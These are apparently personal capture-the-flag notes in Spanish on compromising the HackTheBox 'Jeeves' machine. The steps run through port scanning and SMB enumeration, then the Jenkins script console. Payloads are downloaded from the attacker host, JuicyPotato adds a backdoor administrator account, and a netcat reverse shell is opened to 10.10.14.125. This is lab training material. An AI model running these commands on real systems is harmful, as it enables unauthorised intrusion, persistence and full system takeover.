Cu3rv0x

nmap -A -p- -oA output 10.129.1.109 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA jeeves 10.129.1.109

nmap -sU -O -p- -oA jeeves-udp 10.129.1.109

nikto -h 10.129.1.109:80

Pasted image 20210816133925.png

nmap -sCV -p80,443 10.129.1.109 -oN targeted

Pasted image 20210828155215.png

whatweb 10.129.1.109

Pasted image 20210828155518.png

Nos vamos a http://10.129.1.109

Pasted image 20210828155616.png

crackmapexec smb 10.129.1.109

smbclient -L 10.129.1.109 -N

smbmap -h 10.129.1.109 -u 'null'

Pasted image 20210828160036.png

Nos vamos a http://10.129.1.109:50000/askjeeves/manage

Le damos click a scripts

Nos vamos a http://10.129.1.109:50000/askjeeves/script

cp nc.exe .

python3 /usr/share/doc/python3-impacket/examples/smbserver.py smbFolder $(pwd) -smb2support

nc -lvnp 443

Pasted image 20210828160759.png

python3 -m http.server 80

Pasted image 20210828161738.png

Pasted image 20210828161942.png

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76

Pasted image 20210828163541.png

Vemos que podemos usar juicy potato

Pasted image 20210828182323.png

nc -lvnp 443

python3 -m http.server 80

IWR -uri http://10.10.14.125/nc.exe -OutFile nc.exe

Pasted image 20210828194857.png

cd C:\Windows\Temp

mkdir privesc

cd privesc

Pasted image 20210828183137.png

IWR -uri http://10.10.14.125/JuicyPotato.exe -OutFile juicy.exe

Pasted image 20210828185454.png

C:\Windows\Temp\privesc\juicy.exe =t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net user cu3rv0x password123 /add"

Pasted image 20210828190031.png

C:\Windows\Temp\privesc\juicy.exe =t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net localgroup Administrators cu3rv0x /add"

Pasted image 20210828190513.png

C:\Windows\Temp\privesc\juicy.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\Windows\Temp\privesc\nc.exe -e cmd.exe 10.10.14.125 443" -t *

nc -lvnp 443

cd C:\Users\Administrator\Desktop

dir /r

more < hm.txt:root.txt

Pasted image 20210828195446.png